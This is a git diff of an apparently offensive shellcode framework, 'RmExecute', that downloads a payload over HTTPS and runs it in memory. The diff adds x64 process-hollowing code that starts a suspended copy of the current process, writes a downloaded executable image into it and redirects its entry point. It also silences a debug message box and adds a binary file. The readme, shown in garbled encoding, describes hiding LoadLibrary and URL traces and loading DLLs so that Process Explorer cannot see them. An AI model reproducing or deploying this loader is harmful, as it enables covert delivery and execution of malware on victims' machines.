diff --git a/RmExecute/123.bin b/RmExecute/123.bin
new file mode 100644
index 0000000..b64eced
Binary files /dev/null and b/RmExecute/123.bin differ
diff --git a/RmExecute/Loader.cpp b/RmExecute/Loader.cpp
index 6820815..5b2b99d 100644
--- a/RmExecute/Loader.cpp
+++ b/RmExecute/Loader.cpp
@@ -117,6 +117,7 @@ int _tmain(int argc, _TCHAR* argv[])
 
 int _tmain(int argc, _TCHAR* argv[])
 {
+	
 #endif
 
 
diff --git a/RmExecute/RmExecute.vcxproj b/RmExecute/RmExecute.vcxproj
index 07df817..feabde1 100644
--- a/RmExecute/RmExecute.vcxproj
+++ b/RmExecute/RmExecute.vcxproj
@@ -159,6 +159,11 @@
       <AdditionalDependencies>user32.lib;winhttp.lib;msvcrt.lib;</AdditionalDependencies>
     </Link>
   </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PreprocessorDefinitions>_DEBUG</PreprocessorDefinitions>
+    </ClCompile>
+  </ItemDefinitionGroup>
   <ItemGroup>
     <ClInclude Include="api.h" />
     <ClInclude Include="hash.h" />
diff --git a/RmExecute/ShellCode.cpp b/RmExecute/ShellCode.cpp
index 6742eb2..d1a5f84 100644
--- a/RmExecute/ShellCode.cpp
+++ b/RmExecute/ShellCode.cpp
@@ -1,10 +1,15 @@
 #include "ShellCode.h"
 
 //加载起始函数，跳转到入口函数
+#ifdef _WIN64
+VOID  mmLoaderSCStart(){
+	Strat();
+#else
 VOID _declspec(naked) mmLoaderSCStart()
 {
-	
+
 	__asm	jmp Strat;
+#endif
 }
 
 
@@ -49,7 +54,7 @@ public:
 	
 
 	//提取项目的main文件，StartSCode相当于项目的main函数
-	void __stdcall StartSCode(char * URL)
+	void __stdcall StartSCode()
 	{
 		
 		
@@ -62,7 +67,7 @@ public:
 
 		int size = HttpDownload(host, path, 443, TRUE);
 
-		fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
+		//fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK);
 	
 		RunPortableExecutable();
 
@@ -75,15 +80,21 @@ public:
 };
 
 //sehllcode入口函数
-void __stdcall Strat(char * URL)
+void __stdcall Strat()
 {
 	//由于需要模拟全局变量，所以使用类包裹下
 	RmExecute runclass;
 	
-	runclass.StartSCode(URL);
+	runclass.StartSCode();
 }
-
+#ifdef _WIN64
+void  mmLoaderSCEnd()
+{
+	
+#else
 void __declspec(naked) mmLoaderSCEnd()
 {
+
 	__asm int 3;
+#endif
 }
\ No newline at end of file
diff --git a/RmExecute/ShellCode.h b/RmExecute/ShellCode.h
index 88e841e..a0e4121 100644
--- a/RmExecute/ShellCode.h
+++ b/RmExecute/ShellCode.h
@@ -9,7 +9,7 @@
 EXTERN_C VOID
 mmLoaderSCStart();//这里用来表明shellcode的开始
 
-void __stdcall Strat(char * URL);//入口函数main
+void __stdcall Strat();//入口函数main
 
 EXTERN_C VOID
 mmLoaderSCEnd();//与开头对应的结尾
\ No newline at end of file
diff --git a/RmExecute/Tool.h b/RmExecute/Tool.h
index 440a874..f3696ae 100644
--- a/RmExecute/Tool.h
+++ b/RmExecute/Tool.h
@@ -311,7 +311,73 @@ int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,B
 	return dwLast;
 }
 
+#ifdef _WIN64
+bool RmExecute::RunPortableExecutable() {
+	IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
+	IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
+	IMAGE_SECTION_HEADER* SectionHeader;
 
+	PROCESS_INFORMATION PI;
+	STARTUPINFOA SI;
+
+	CONTEXT* CTX;
+
+	ULONG_PTR* ImageBase; //Base address of the image
+	void* pImageBase; // Pointer to the image base
+
+	int count;
+	char CurrentFilePath[1024];
+
+	DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable
+	NtHeader = PIMAGE_NT_HEADERS(ULONG_PTR(newbuff) + DOSHeader->e_lfanew); // Initialize
+
+	GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable
+
+	if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
+	{
+		ZeroMemory(&PI, sizeof(PI)); // Null the memory
+		ZeroMemory(&SI, sizeof(SI)); // Null the memory
+
+		if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
+			CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
+			//process in suspended state, for the new image.
+		{
+			// Allocate memory for the context.
+			CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
+			CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
+
+			if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
+			{
+				// Read instructions
+				ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Rbx + 8), LPVOID(&ImageBase), 4, 0);
+
+				pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
+					NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
+
+				// Write the image to the process
+				WriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
+
+				for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
+				{
+					SectionHeader = PIMAGE_SECTION_HEADER(ULONG_PTR(newbuff) + DOSHeader->e_lfanew + 248 + (ULONG_PTR)(count * 40));
+
+					WriteProcessMemory(PI.hProcess, LPVOID(ULONG_PTR(pImageBase) + SectionHeader->VirtualAddress),
+						LPVOID(ULONG_PTR(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
+				}
+				WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rbx + 8),
+					LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);
+
+				// Move address of entry point to the rax register
+				CTX->Rax = ULONG_PTR(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
+				SetThreadContext(PI.hThread, LPCONTEXT(CTX));
+				ResumeThread(PI.hThread);
+
+				return 0;
+			}
+		}
+	}
+}
+#else
 bool RmExecute::RunPortableExecutable()
 {
 	
@@ -379,3 +445,4 @@ bool RmExecute::RunPortableExecutable()
 	}
 	return false;
 }
+#endif
\ No newline at end of file
diff --git a/readme.md b/readme.md
index 4d615f6..793bc3a 100644
--- a/readme.md
+++ b/readme.md
@@ -2,7 +2,7 @@
 
 Remote Download and Memory Execute for shellcode framework
 
-杩滅▼涓嬭浇骞跺唴瀛樺姞杞界殑ShellCode妗嗘灦锛屾殏涓嶆敮鎸乆64
+杩滅▼涓嬭浇骞跺唴瀛樺姞杞界殑ShellCode妗嗘灦锛屽凡缁忔敮鎸亁64
 
 # 鍙傦紙鎶勶級鑰冿紙琚級椤圭洰
 
@@ -63,10 +63,6 @@ pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);
 
 闅愯棌loadlibrary鐗瑰緛鍜寀rl鐗瑰緛锛屾洿涓嶅鏄撹鍙戠幇
 
-## X64鏀寔
-
-鑷璋冭瘯`Tool.h->RunPortableExecutable`鍑芥暟锛屽ぇ姒傚氨鏄姞涓猉64瀹忔妸EAX浠�涔堟崲鎴怰AX(搴旇
-
 ## 鍙嶅皠DLL鍔犺浇鎶�鏈�
 
 瀹屽叏涓嶄娇鐢↙oadLibrary锛孭rocessExplorer銆乸rocexp64绛夊伐鍏锋棤娉曟娴嬪埌杩欎釜dll锛屽悓鏃惰绋嬪簭鍙樺緱妯″潡鍖�